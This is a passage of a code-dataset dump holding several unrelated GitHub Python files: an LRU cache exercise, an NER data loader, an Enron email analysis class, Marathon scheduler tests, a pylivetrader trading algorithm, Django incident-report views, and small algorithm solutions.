mv_node.key\n\n # mv_node.pre.next = self.tail\n # self.tail.pre = mv_node.pre\n # self.clearNode(mv_node)\n # self.cache.pop(key)\n\n # def clearNode(self, node):\n # node.next = None\n # node.pre = None\n\nif __name__ == '__main__':\n c = LRUCache(2)\n c.put(1,1)\n print(c.get(1))\n c.put(2,2)\n print(c.get(2))\n print(c.get(1))\n c.put(3,3)\n print(c.get(2))\n print(c.get(1))\n print(c.get(3))\n print(c.get(4))\n\n\n# import collections\n# class LRUCache:\n\n# def __init__(self, capacity: int):\n# self.capacity = capacity\n# self.dic = collections.OrderedDict()\n\n# def get(self, key: int) -> int:\n# if key in self.dic:\n# value = self.dic.pop(key)\n# self.dic[key] = value\n# return value\n# else:\n# return -1\n\n# def put(self, key: int, value: int) -> None:\n# if key in self.dic:\n# self.dic.pop(key)\n\n# else:\n# if self.capacity > 0:\n# self.capacity -= 1\n# else:\n# self.dic.popitem(False)\n# self.dic[key] = value\n\n\n# Your LRUCache object will be instantiated and called as such:\n# obj = LRUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)\n\n\n","repo_name":"LouisU/practice","sub_path":"leetcode/146.py","file_name":"146.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2834426584","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport numpy as np\nimport os\n\nbase_dir = 'data'\nstopwords_dir = os.path.join(base_dir, 'stop_words.txt')\n\n\ndef open_file(filename, mode='r'):\n return open(filename, mode, encoding='utf-8', errors='ignore')\n\n\ndef read_file(filename):\n contents = []\n with open_file(filename) as f:\n for line in f:\n try:\n conts = re.split('\\s+', line.strip())\n contents.append(conts)\n except:\n print(line)\n return contents\n\n\ndef stopwords_list(filename):\n stopwords = []\n with open_file(filename) as f:\n for line in f:\n try:\n content = line.strip()\n stopwords.append(content)\n except:\n pass\n return stopwords\n\n\nstopwords = stopwords_list(stopwords_dir)\n\n\ndef remove_stopwords(content):\n return list(set(content).difference(set(stopwords)))\n\n\ndef word2features(words, i):\n # TODO 还可以取词的ngram特征\n word = words[i]\n\n features = {\n 'bias': 1.0,\n 'word.lower()': word.lower(), # 当前词\n # 'word[-3:]': word[-3:],\n # 'word[-2:]': word[-2:],\n # 'word.isupper()': word.isupper(),\n # 'word.istitle()': word.istitle(),\n 'word.isdigit()': word.isdigit(),\n # 'postag': postag,\n # 'postag[:2]': postag[:2],\n }\n if i > 0:\n word1 = words[i-1]\n features.update({\n '-1:word.lower()': word1.lower(), # 当前词的前一个词\n # '-1:word.istitle()': word1.istitle(),\n # '-1:word.isupper()': word1.isupper(),\n # '-1:postag': postag1,\n # '-1:postag[:2]': postag1[:2],\n })\n else:\n features['BOS'] = True\n\n if i < len(words)-1:\n word1 = words[i+1]\n features.update({\n '+1:word.lower()': word1.lower(), # 当前词的后一个词\n # '+1:word.istitle()': word1.istitle(),\n # '+1:word.isupper()': word1.isupper(),\n # '+1:postag': postag1,\n # '+1:postag[:2]': postag1[:2],\n })\n else:\n features['EOS'] = True\n\n return features\n\n\ndef process_crf_file(crf_train_source_dir, crf_train_target_dir):\n features = []\n labels = []\n with open_file(crf_train_source_dir) as f:\n for line in f:\n feature = []\n words = re.split('\\s+', line.strip())\n for i in range(len(words)):\n feature.append(word2features(words, i))\n features.append(feature)\n\n with open_file(crf_train_target_dir) as f:\n for line in f:\n label = []\n ls = re.split('\\s+', line.strip())\n for i in range(len(ls)):\n label.append(ls[i])\n labels.append(label)\n\n return np.array(features), np.array(labels)\n\n\ndef build_vocab(total_dir, vocab_dir):\n \"\"\"根据训练集构建词汇表,存储\"\"\"\n print(\"building vacab...\")\n final_words = [\"Padding\", \"Unknown\"]\n with open_file(total_dir) as f:\n for line in f:\n conts = re.split('\\s+', line.strip())\n for con in conts:\n final_words.append(con)\n open_file(vocab_dir, mode='w').write('\\n'.join(set(final_words)) + '\\n')\n\n\ndef read_vocab(vocab_dir):\n \"\"\"读取词汇表\"\"\"\n words = open_file(vocab_dir).read().strip().split('\\n')\n word_to_id = dict(zip(words, range(len(words))))\n return words, word_to_id\n\n\ndef read_category(target_dir):\n cates = ['Padding']\n with open_file(target_dir) as f:\n for line in f:\n cates.extend(re.split('\\s+', line.strip()))\n categories = list(set(cates))\n cat_to_id = dict(zip(categories, range(len(categories))))\n return categories, cat_to_id\n\n\ndef pad_sequences(sequences,\n maxlen=None,\n dtype='int32',\n padding='post',\n truncating='post',\n value=0.):\n if not hasattr(sequences, '__len__'):\n raise ValueError('`sequences` must be iterable.')\n lengths = []\n for x in sequences:\n if not hasattr(x, '__len__'):\n raise ValueError('`sequences` must be a list of iterables. '\n 'Found non-iterable: ' + str(x))\n lengths.append(len(x))\n\n num_samples = len(sequences)\n if maxlen is None:\n maxlen = np.max(lengths)\n\n # take the sample shape from the first non empty sequence\n # checking for consistency in the main loop below.\n sample_shape = tuple()\n for s in sequences:\n if len(s) > 0: # pylint: disable=g-explicit-length-test\n sample_shape = np.asarray(s).shape[1:]\n break\n\n x = (np.ones((num_samples, maxlen) + sample_shape) * value).astype(dtype)\n for idx, s in enumerate(sequences):\n if not len(s): # pylint: disable=g-explicit-length-test\n continue # empty list/array was found\n if truncating == 'pre':\n trunc = s[-maxlen:] # pylint: disable=invalid-unary-operand-type\n elif truncating == 'post':\n trunc = s[:maxlen]\n else:\n raise ValueError('Truncating type \"%s\" not understood' % truncating)\n\n # check `trunc` has expected shape\n trunc = np.asarray(trunc, dtype=dtype)\n if trunc.shape[1:] != sample_shape:\n raise ValueError(\n 'Shape of sample %s of sequence at position %s is different from '\n 'expected shape %s'\n % (trunc.shape[1:], idx, sample_shape))\n\n if padding == 'post':\n x[idx, :len(trunc)] = trunc\n elif padding == 'pre':\n x[idx, -len(trunc):] = trunc\n else:\n raise ValueError('Padding type \"%s\" not understood' % padding)\n return x\n\n\ndef process_nn_crf_source_file(source_total_dir, word_to_id, seq_length):\n \"\"\"将文件转换为id表示\"\"\"\n contents = read_file(source_total_dir)\n len_ = len(contents)\n len_texts = []\n\n data_id = []\n for i in range(len_):\n data_id_in_text = []\n for x in contents[i]:\n if x in word_to_id:\n data_id_in_text.append(word_to_id[x])\n else:\n data_id_in_text.append(word_to_id['Unknown'])\n data_id.append(data_id_in_text)\n\n if len(data_id_in_text) >= seq_length:\n len_texts.append(seq_length)\n else:\n len_texts.append(len(data_id_in_text))\n\n x_pad = pad_sequences(data_id, seq_length, value=word_to_id['Padding'])\n\n return x_pad, len_texts\n\n\ndef process_nn_crf_target_file(target_total_dir, cat_to_id, seq_length):\n tags = read_file(target_total_dir)\n tag_id = []\n for i in range(len(tags)):\n tag_id_in_text = []\n for y in tags[i]:\n tag_id_in_text.append(cat_to_id[y])\n tag_id.append(tag_id_in_text)\n y_pad = pad_sequences(tag_id, seq_length, value=cat_to_id['Padding'])\n\n return y_pad\n\n\ndef batch_iter(x, y, len_, batch_size=64):\n \"\"\"生成批次���据\"\"\"\n data_len = len(x)\n num_batch = int((data_len - 1) / batch_size) + 1\n\n indices = np.random.permutation(np.arange(data_len))\n x_shuffle = []\n y_shuffle = []\n len_shuffle = []\n for i in range(len(indices)):\n x_shuffle.append(x[indices[i]])\n y_shuffle.append(y[indices[i]])\n len_shuffle.append(len_[indices[i]])\n\n for i in range(num_batch):\n start_id = i * batch_size\n end_id = min((i + 1) * batch_size, data_len)\n yield x_shuffle[start_id:end_id], y_shuffle[start_id:end_id], len_shuffle[start_id:end_id]\n","repo_name":"qianshuang/NER","sub_path":"data/cnews_loader.py","file_name":"cnews_loader.py","file_ext":"py","file_size_in_byte":7588,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72775004854","text":"# 문제 : https://www.acmicpc.net/problem/11399\n\nimport sys\ninput = sys.stdin.readline\n\nn = int(input().strip())\narr = sorted(list(map(int, input().split())))\nres = 0\n\nfor i in range(0,len(arr)):\n #print(arr[:i+1])\n res+=sum(arr[:i+1])\n\n\nprint(res)","repo_name":"JangAyeon/Algorithm","sub_path":"백준/11399.py","file_name":"11399.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72533828534","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nimport seaborn\nimport pandas as pd\n\nfrom helper_functions import *\n\nclass emailData():\n def __init__(self, df):\n \n if df.columns.values[0] == 'time':\n self.transformed_df = df\n \n else:\n self.transformed_df = self._reformat_dataframe(df)\n \n \n self.all_names, self.senders, self.receivers, self.individual_emails = self.get_all_name_list(self.transformed_df)\n self.counts_df = self.name_aggregate_counts(self.transformed_df)\n self.prolific_senders = self.get_prolific_senders(15)\n self.current_time_ag = [self.transformed_df]\n \n def _reformat_dataframe(self, df):\n '''This function takes in the original dataframe and puts it into a more usable format \n (what I call a transformed dataframe). Time is in days.'''\n headers = ['time', 'messageid', 'sender', 'recipients', 'topic', 'mode']\n df.columns = headers\n df.drop(['topic', 'mode'], axis = 1, inplace = True)\n df.recipients = df.recipients.astype(str)\n df.recipients = df.recipients.apply(split_emails)\n df.time = (df.time - df.time.min())/(1000*60*60*24)\n \n return df\n \n def get_all_name_list(self, df):\n '''This function takes in a transformed dataframe and returns a list of all names as well as just sender and recipients.\n Also the original df has multiple recipients in one row so I make a list of the form [[sender, receiver1], [sender, receiver2]]'''\n \n sender_names = df.sender.values\n recipient_lists = df.recipients.values\n\n individual_emails = np.array([[sender_names[i], recipi] for i in xrange(len(recipient_lists)) for recipi in recipient_lists[i]])\n \n sender_names = list(set(sender_names))\n recipient_names = list(set([item for sublist in recipient_lists for item in sublist]))\n \n return list(set(sender_names + recipient_names)), sender_names, recipient_names, individual_emails\n \n def name_aggregate_counts(self, df):\n ''' Here I'm doing counts grouped by name. (hence name_aggregate)'''\n sender_names = list(df.sender.values)\n recipient_lists = df.recipients.values\n\n recipient_names = [item for sublist in recipient_lists for item in sublist]\n \n recipient_series = pd.Series(recipient_names)\n recp_counts = recipient_series.value_counts()\n send_counts = df.sender.value_counts()\n \n countdf = pd.DataFrame(self.all_names, columns = ['person'], index = self.all_names)\n \n countdf['sent'] = send_counts\n countdf['received'] = recp_counts\n countdf.names = countdf.person.astype(str)\n countdf = countdf.fillna(0)\n\n countdf.sent = countdf.sent.astype(int)\n countdf.received = countdf.received.astype(int)\n \n countdf.sort_values('sent', ascending=False, inplace=True)\n return countdf\n \n def time_aggregate(self, start_date, end_date, num_days):\n ''' Here I partition a transformed data frame between start_date (in days) and end_date (in days).\n num_days is the number of days that is in each partition'''\n num_partitions = np.ceil((end_date - start_date)/num_days) + 1\n\n df = start_end_sep(self.transformed_df, start_date, end_date)\n\n times = np.linspace(start_date, end_date, num_partitions)\n sub_data = [start_end_sep(df, times[i], times[i+1]) for i in xrange(len(times)-1)]\n\n self.current_time_ag = sub_data\n return sub_data\n \n def name_time_aggregate(self, start_date, end_date, num_days):\n ''' This combines the last two functions an breaks down the df into other dfs by time\n and then performs sent-received counts on each of those dfs.'''\n sub_data = self.time_aggregate(start_date, end_date, num_days)\n return [self.name_aggregate_counts(data) for data in sub_data]\n\n def get_prolific_senders(self, num_std):\n ''' The class has a method to get prolific senders based on whether they emailed some number of standard deviations\n above the mean'''\n std_sent = self.counts_df.sent.std()\n mean_sent = self.counts_df.sent.mean()\n return self.counts_df.person[self.counts_df.sent > num_std*std_sent + mean_sent].values","repo_name":"lisamnash/data_practice","sub_path":"Enron_email_data/emailData.py","file_name":"emailData.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32174181175","text":"from __future__ import print_function, absolute_import, division\n\nimport os\nimport time\nimport pytest\n\nfrom epos.marathon import marathon, destroy, deployments, app, apps\nfrom satyr.utils import timeout\n\n\nhost = os.environ.get('MARATHON_HOST')\npytestmark = pytest.mark.skipif(\n not host, reason=\"MARATHON_HOST environment variable must be set\")\n\n\n@pytest.yield_fixture(autouse=True)\ndef destroy_apps():\n try:\n yield\n finally:\n for a in apps(host=host):\n destroy(id=a['id'], host=host)\n\n with timeout(15):\n while len(deployments(host=host)):\n time.sleep(.1)\n\n assert len(apps(host=host)) == 0\n\n\ndef test_marathon():\n uris = ['https://github.com/cloudpipe/cloudpickle/archive/v0.2.1.tar.gz']\n pythonpath = '$MESOS_SANDBOX/cloudpickle-0.2.1'\n\n @marathon(docker=None, cpus=0.1, mem=64, path=pythonpath, uris=uris,\n host=host)\n def test(a, b):\n while True:\n time.sleep(0.1)\n print('Slept 0.1s')\n\n mid = test(1, 2)\n with timeout(20):\n while len(deployments(host=host)):\n time.sleep(.1)\n\n result = app(id=mid, host=host)\n assert result['tasksRunning'] == 1\n\n\ndef test_marathon_docker():\n @marathon(cpus=0.1, mem=64, host=host)\n def docker(a, b):\n while True:\n time.sleep(0.1)\n print('Slept 0.1s')\n\n mid = docker(1, 2)\n with timeout(20):\n while len(deployments(host=host)):\n time.sleep(.1)\n\n result = app(id=mid, host=host)\n assert result['tasksRunning'] == 1\n","repo_name":"daskos/epos","sub_path":"epos/tests/test_marathon.py","file_name":"test_marathon.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"3909191703","text":"from pylivetrader.api import (\r\n attach_pipeline,\r\n date_rules,\r\n time_rules,\r\n order,\r\n order_target_percent,\r\n get_open_orders,\r\n cancel_order,\r\n pipeline_output,\r\n schedule_function,\r\n)\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n#API imports for pipeline\r\nfrom pylivetrader.finance.execution import LimitOrder\r\nfrom zipline.pipeline import Pipeline\r\n#from quantopian.pipeline import Pipeline\r\n#from quantopian.algorithm import attach_pipeline, pipeline_output\r\nfrom pipeline_live.data.iex.pricing import USEquityPricing\r\n#from quantopian.pipeline.data.builtin import USEquityPricing\r\nfrom pipeline_live.data.polygon.filters import (\r\n IsPrimaryShareEmulation as IsPrimaryShare)\r\n#from quantopian.pipeline.filters.morningstar import IsPrimaryShare #,Q3000US, QTradableStocksUS\r\nfrom pipeline_live.data.iex.factors import (\r\n AnnualizedVolatility\r\n)\r\n#from quantopian.pipeline.factors import AnnualizedVolatility\r\nimport logbook\r\nlog = logbook.Logger('algo')\r\n\r\ndef record(*args, **kwargs):\r\n print('args={}, kwargs={}'.format(args, kwargs))\r\n log.info(\"START TEST\")\r\n\r\ndef initialize (context): # runs once when script starts\r\n #context is a python dictionary that contains information on portfolio/performance.\r\n context.idr_losers = pd.Series(([]))\r\n context.day_count = 0\r\n context.daily_message = \"Day {}.\"\r\n context.open_orders = get_open_orders()\r\n context.backup_stocks = symbols('VTI')\r\n\r\n #Factor criteria\r\n #dolvol = AverageDollarVolume(window_length = 1)\r\n close_price = USEquityPricing.close.latest\r\n vol = USEquityPricing.volume.latest\r\n ann_var = AnnualizedVolatility()\r\n #daily_return = DailyReturns([USEquityPricing.close], window_length = 2) #-- going to use history instead of pipeline\r\n \r\n #screening\r\n mask_custom = (IsPrimaryShare() & (vol < 200000) & (close_price > 1) & (close_price < 3) & (ann_var > 0.815)) # Q3000US(8000000) &\r\n stockBasket = USEquityPricing.close.latest.top(3000, mask = mask_custom)\r\n \r\n #Column construction\r\n pipe_columns = {'close_price': close_price, \"volume\": vol, 'ann_var': ann_var}\r\n \r\n #Ceation of actual pipeline\r\n pipe = Pipeline(columns = pipe_columns, screen = stockBasket)\r\n attach_pipeline(pipe, \"Stocks\")\r\n\r\n #Schedule functions\r\n schedule_function(late_day_trade, date_rules.every_day(), time_rules.market_open(hours = 5, minutes = 56)) #offset open tells when to run a user defined function\r\n schedule_function(check_portfolio, date_rules.every_day(), time_rules.market_open(hours = 0, minutes = 1))\r\n schedule_function(morning_day_trade1, date_rules.every_day(), time_rules.market_open(hours = 0, minutes = 15))\r\n #schedule_function(check_portfolio, date_rules.every_day(), time_rules.market_open(hours = 0, minutes = 16))\r\n schedule_function(morning_day_trade2, date_rules.every_day(), time_rules.market_open(hours = 0, minutes = 45))\r\n \r\n #schedule_function(morning_day_trade3, date_rules.every_day(), time_rules.market_open(hours = 2, minutes = 0))\r\n #schedule_function(check_portfolio, date_rules.every_day(), time_rules.market_open(hours = 0, minutes = 48))\r\n \r\ndef late_day_trade(context, data):\r\n #Get the pipeline output\r\n pipe_output = pipeline_output('Stocks')\r\n context.days_stocks = pipe_output.sort_values(by =['ann_var'], ascending = False)\r\n #log.info(context.days_stocks)\r\n log.info(context.daily_message, context.day_count)\r\n log.info(context.days_stocks)\r\n log.info(type(context.days_stocks))\r\n \r\n #Calculate Daily Return Top Losers\r\n if (context.days_stocks.size > 0):\r\n price_history = data.history(context.days_stocks.index, \"price\", 745, \"1m\") #356 +390\r\n open_prices = price_history.iloc[0]\r\n current_prices = price_history.iloc[-1]\r\n context.idr_losers = ((current_prices - open_prices) / open_prices).sort_values()\r\n context.idr_losers = context.idr_losers[0:5]#5 \r\n log.info(context.idr_losers)\r\n else:\r\n price_history = data.history(context.backup_stocks, \"price\", 1 , \"1m\") #356\r\n current_prices = price_history.iloc[-1]\r\n context.idr_losers = current_prices #Stock info is irrelevant here \r\n \r\n pct_cash = context.portfolio.cash/context.portfolio.portfolio_value\r\n \r\n #Get Open Orders and Buy\r\n for stock in context.idr_losers.index:\r\n if(data.can_trade(stock)):\r\n if(stock not in context.open_orders):\r\n order_target_percent(stock, pct_cash/(context.idr_losers.size + 1))\r\n \r\n #Check Portfolio\r\n #log.info(type(context.portfolio.positions))\r\n record(leverage = context.account.leverage) #be sure to always track leverage\r\n record(cash = context.portfolio.cash)\r\n record(port_value = context.portfolio.portfolio_value)\r\n \r\ndef morning_day_trade1(context, data):\r\n context.day_count += 1\r\n log.info(context.daily_message, context.day_count)\r\n for stock in context.portfolio.positions:\r\n if((data.current(stock, 'price')) - context.portfolio.positions[stock].cost_basis)/context.portfolio.positions[stock].cost_basis > 0.001:\r\n if (context.portfolio.positions[stock].cost_basis > 0):\r\n num_shares = context.portfolio.positions[stock].amount\r\n order_target(stock, num_shares/2)\r\n log.info(\"{} Current Price = {} :: Cost Basis = {}\",stock.symbol, data.current(stock, 'price'), context.portfolio.positions[stock].cost_basis)\r\n \r\ndef morning_day_trade2(context, data):\r\n for stock in context.portfolio.positions:\r\n if((data.current(stock, 'price')) - context.portfolio.positions[stock].cost_basis)/context.portfolio.positions[stock].cost_basis > 0.001:\r\n if (context.portfolio.positions[stock].amount > 0): #or context.portfolio.positions[stock].amount < 0):\r\n order_target_percent(stock, 0)\r\n log.info(\"{} Current Price = {} :: Cost Basis = {}\",stock.symbol, data.current(stock, 'price'), context.portfolio.positions[stock].cost_basis)\r\n \r\ndef morning_day_trade3(context, data):\r\n for stock in context.portfolio.positions:\r\n if((data.current(stock, 'price')) - context.portfolio.positions[stock].cost_basis)/context.portfolio.positions[stock].cost_basis > 0.2:\r\n if (context.portfolio.positions[stock].amount > 0): #or context.portfolio.positions[stock].amount < 0):\r\n order_target_percent(stock, 0)\r\n log.info(\"{} Current Price = {} :: Cost Basis = {}\",stock.symbol, data.current(stock, 'price'), context.portfolio.positions[stock].cost_basis)\r\n \r\ndef check_portfolio(context, data): #Check for possible splits\r\n i = 0\r\n for stock in context.portfolio.positions:\r\n i = i + 1\r\n if ((data.current(stock, 'price') - context.portfolio.positions[stock].cost_basis)/(context.portfolio.positions[stock].cost_basis) > 1):\r\n log.info(\"{} Current Price = {} :: Cost Basis = {}\",stock.symbol, data.current(stock, 'price'), context.portfolio.positions[stock].cost_basis)\r\n log.info(\"Portfolio Size: {}\", i)\r\n","repo_name":"Karagul/HVL-Interday-Trading","sub_path":"Quantopian HVL v2 Migration.py","file_name":"Quantopian HVL v2 Migration.py","file_ext":"py","file_size_in_byte":7191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2797081310","text":"# Dictionary Exercise 4 (Value Containing Key)\n# 0 puntos posibles (no calificados)\n# Write a function named return_keys which accepts a dictionary and an integer as input and returns an ascending sorted list of all the keys whose values contain the input integer. Note that the keys of this dictionary are strings while the values of this dictionary are 1 Dimensional lists of integers. For example if the input dictionary is:\n#\n# sample_dictionary = {\"rabbit\" : [1, 2, 3], \"kitten\" : [2, 2, 6], \"lioness\": [6, 8, 9]}\n# if your function is called as return_keys(sample_dictionary,2) , then your function should return:\n# [ \"kitten\", \"rabbit\",]\n# If the input integer is not found then your function should return an empty list.\n#\ndef return_keys(sample_dictionary, sample_value):\n output_list = []\n keys = sample_dictionary.keys()\n for nombre in keys:\n lista_valor = sample_dictionary[nombre]\n valor_1=lista_valor[0]\n valor_2=lista_valor[1]\n valor_3=lista_valor[2]\n if valor_1==sample_value or valor_2==sample_value or valor_3==sample_value:\n output_list.append(nombre)\n output_list.sort()\n return output_list\n\n# OJO SOLO LA FUNCION!!! \n# Main Program #\nsample_value=2\nsample_dictionary = {'Crow': [11, 12, 3], 'Chicken': [12, 2, 16], 'Bat': [12, 3, 0], 'Sparrow': [6, 8, 9]}\nevalua_return_keys = return_keys(sample_dictionary, sample_value)\nprint(evalua_return_keys)\n","repo_name":"ivanromanv/manuales","sub_path":"Python/Edx_Course/Introduction to Programming Using Python/Excercises/W7_Dictionary_E4_Function_valor_contiene_clave.py","file_name":"W7_Dictionary_E4_Function_valor_contiene_clave.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15554831163","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import KPIIncidentReport, KPILead, KPITeam, KPICompany\nfrom .forms import IReportForm\nfrom django.contrib.auth.decorators import login_required\n\nimport openpyxl\nimport datetime\n\n\n@login_required(login_url='/')\ndef kpi_home_page(request):\n context = dict()\n context['incidents'] = KPIIncidentReport.objects.all()\n return render(request, 'templates/index.html', context)\n\n\n@login_required(login_url='/')\ndef incident_detail(request, incident_id):\n context = dict()\n context['incident'] = KPIIncidentReport.objects.get(pk=incident_id)\n return render(request, 'templates/incident_detail.html', context)\n\n\n@login_required(login_url='/')\ndef kpi_leads(request):\n context = dict()\n context['companies'] = KPICompany.objects.all()\n context['leads'] = KPILead.objects.all()\n return render(request, 'templates/eftleads.html', context)\n\n\n@login_required(login_url='/')\ndef kpi_teams(request):\n context = dict()\n context['companies'] = KPICompany.objects.all()\n context['teams'] = KPITeam.objects.all()\n return render(request, 'templates/eftteams.html', context)\n\n\n@login_required(login_url='/')\ndef eftlead_detail(request, eftlead_id):\n context = dict()\n context['eftlead'] = KPILead.objects.get(pk=eftlead_id)\n context['team_names'] = KPITeam.objects.filter(eft_lead__id=eftlead_id)\n context['incidents'] = KPIIncidentReport.objects.filter(eft_lead__id=eftlead_id)\n context['image_url'] = context['eftlead'].profile_pic.url\n return render(request, 'templates/eftlead.html', context)\n\n\n@login_required(login_url='/')\ndef eftteam_detail(request, eftteam_id):\n context = dict()\n context['eftteam'] = KPITeam.objects.get(pk=eftteam_id)\n context['eftleads'] = KPILead.objects.filter(kpiteam__id=eftteam_id)\n context['incidents'] = KPIIncidentReport.objects.filter(team_name__id=eftteam_id)\n context['team_picture'] = context['eftteam'].team_pic.url\n return render(request, 'templates/eftteam.html', context)\n\n\n@login_required(login_url='/')\ndef kpi_company(request, company_id):\n context = dict()\n context['company'] = KPICompany.objects.get(pk=company_id)\n\n context['eftleads'] = KPILead.objects.filter(company__id=company_id)\n context['lead_count'] = len(KPILead.objects.filter(company__id=company_id))\n\n context['teams'] = KPITeam.objects.filter(company__id=company_id)\n context['team_count'] = len(KPITeam.objects.filter(company__id=company_id))\n\n context['incidents'] = KPIIncidentReport.objects.filter(company__id=company_id)\n context['inc_count'] = len(KPIIncidentReport.objects.filter(company__id=company_id))\n\n context['company_picture'] = context['company'].company_pic.url\n return render(request, 'templates/eft_company.html', context)\n\n\n@login_required(login_url='/')\ndef kpi_create(request):\n if request.method == \"POST\":\n form = IReportForm(request.POST)\n if form.is_valid():\n incident = KPIIncidentReport()\n incident.date = form.cleaned_data['date']\n incident.ir_num = form.cleaned_data['ir_num']\n\n incident.company = form.cleaned_data['company']\n incident.eft_lead = form.cleaned_data['eft_lead']\n incident.team_name = form.cleaned_data['team_name']\n incident.incident = form.cleaned_data['incident']\n incident.description = form.cleaned_data['description']\n incident.hours_deducted = form.cleaned_data['hours_deducted']\n incident.reportable = form.cleaned_data['reportable']\n incident.reason = form.cleaned_data['reason']\n\n incident.save()\n return redirect('kpi_home_page')\n else:\n print(\"Form is not valid.\")\n else:\n form = IReportForm()\n return render(request, 'templates/eftcreate.html', {'form': form})\n\n\n@login_required(login_url='/')\ndef kpi_update(request, incident_id):\n incident = get_object_or_404(KPIIncidentReport, pk=incident_id)\n form = IReportForm(request.POST or None, instance=incident)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n return redirect('kpi_home_page')\n return render(request, 'templates/eftcreate.html', {'form': form})\n\n\n@login_required(login_url='/')\ndef kpi_export(request, incident_id):\n incident = get_object_or_404(KPIIncidentReport, pk=incident_id)\n wb = openpyxl.load_workbook(\"Incident Report.xlsx\")\n ws = wb.get_sheet_by_name(\"Sheet1\")\n ws.cell(row=1, column=1).value = \"Incident Report \" + incident.ir_num\n ws.cell(row=3, column=5).value = incident.date\n ws.cell(row=4, column=5).value = incident.ir_num\n ws.cell(row=5, column=5).value = incident.company.name\n ws.cell(row=6, column=5).value = incident.eft_lead.name\n ws.cell(row=7, column=5).value = incident.team_name.name\n ws.cell(row=8, column=5).value = incident.hours_deducted\n ws.cell(row=9, column=5).value = incident.reportable\n ws.cell(row=10, column=5).value = incident.reason\n ws.cell(row=12, column=5).value = datetime.datetime.now()\n ws.cell(row=13, column=5).value = ''\n\n file_name = \"Incident Report \" + incident.ir_num + \".xlsx\"\n\n wb.save(file_name)\n return redirect('kpi_home_page')\n\n\n@login_required(login_url='/')\ndef kpi_delete(request, incident_id):\n incident = get_object_or_404(KPIIncidentReport, pk=incident_id)\n incident.delete()\n return redirect('kpi_home_page')\n\n\n@login_required(login_url='/')\ndef kpi_duplicate(request):\n return render(request, 'templates/kpi_duplicate.html')\n\n\n@login_required(login_url='/')\ndef kpi_help(request):\n context = dict()\n return render(request, 'templates/help.html', context)","repo_name":"GStrydom/incidentreport","sub_path":"kpi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16027343284","text":"# 보이는 점의 개수, S2, 누적합, 수학\n# x, y 가 서로 안나눠떨어지면 된다\n# y % x != 0\n# x % y != 0 -> gcd(x, y) == 1\n\nfrom math import gcd\nfrom sys import stdin\n\npsum = [0 for _ in range(1001)]\npsum[1] = 3\nfor x in range(2, 1001):\n cnt = 0\n for y in range(1, x + 1):\n if x == y: # 절반만\n continue\n if gcd(x, y) == 1:\n cnt += 2 # y=x에 대해 대칭이니까 +2 씩\n psum[x] = psum[x-1] + cnt\n\n\nC = int(stdin.readline())\nfor _ in range(C):\n n = int(stdin.readline())\n print(psum[n])","repo_name":"lookinmin/CodingTest","sub_path":"누적합/BOJ_2725.py","file_name":"BOJ_2725.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16092441287","text":"import math\nclass Node:\n def __init__(self, value):\n self.right = None\n self.left = None\n self.value = value\n\na = Node(5)\nb = Node(11)\nc = Node(3)\nd = Node(4)\ne = Node(2)\nf = Node(1)\n\n#a = Node('a')\n#b = Node('b')\n#c = Node('c')\n#d = Node('d')\n#e = Node('e')\n#f = Node('f')\n\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.right = f\n\ndef maxPathSum(root : Node):\n if root == None: return -math.inf\n if root.left == None and root.right == None: return root.value\n return root.value + max(maxPathSum(root.left), maxPathSum(root.right))\n\nprint(maxPathSum(a))\n","repo_name":"tyren234/codes","sub_path":"python/random/btree_max_path_sum.py","file_name":"btree_max_path_sum.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9501502723","text":"def jitter(wild):\n \"\"\"\n'jitter' is a recursive iterator function which effectively jumps in and out of\nelement context as necessary to unravel a 'tree' of html elements, and strings in\nlists and tuples.\n \"\"\"\n if not wild:\n return\n elif isinstance(wild, str):\n yield wild\n elif isinstance(wild, (list, tuple)):\n for el in wild:\n yield from jitter(el)\n else:\n yield from wild\n\n\nclass Element:\n\n \"\"\"\nEach possible HTML tag is defined as a class inheriting this class.\nThe name of the class is the lower case tag string with a leading underscore added,\ne.g. '_h3' or '_br'. When no attributes are associated with a tag, it can be expressed\nsimply by e.g. 'h.br' or 'h.h4' (without the quotes). Such references are 'corrected'\n(by __getattr__ - see above) to return an instance of the corresponding class.\nWhen, however, attributes are required, it must be expressed as e.g.\n'h.a(href='somewhere')'. Note that this calls - not creates - an instance (see\nmember function '__call__' below). Differences of the 'rules of use' of various html tags\nare handled by the attribute 'attr_dict' which can be a (often empty) tuple of\ndictionaries. keys of each dictionary represent valid attributes for this _Element.\nThe corresponding values are (in the current implementation) booleans indicating\nwhether a value is associated with this attribute. False means that the value must not be\nsupplied and will automatically be derived from the attribute name. This will probably be\nchanged in a later release, e.g. to use a function or class as a value; this will make\nvalidation and manipulation of numeric values easier. N.B. class Element must be declared\nwithin class _HTML40. This ensures that e.g. h._h4 where h is obtained by e.g.\n'h = _HTML40()' is a valid attribute reference (see __getattr__ above).\n \"\"\"\n attr_dict = 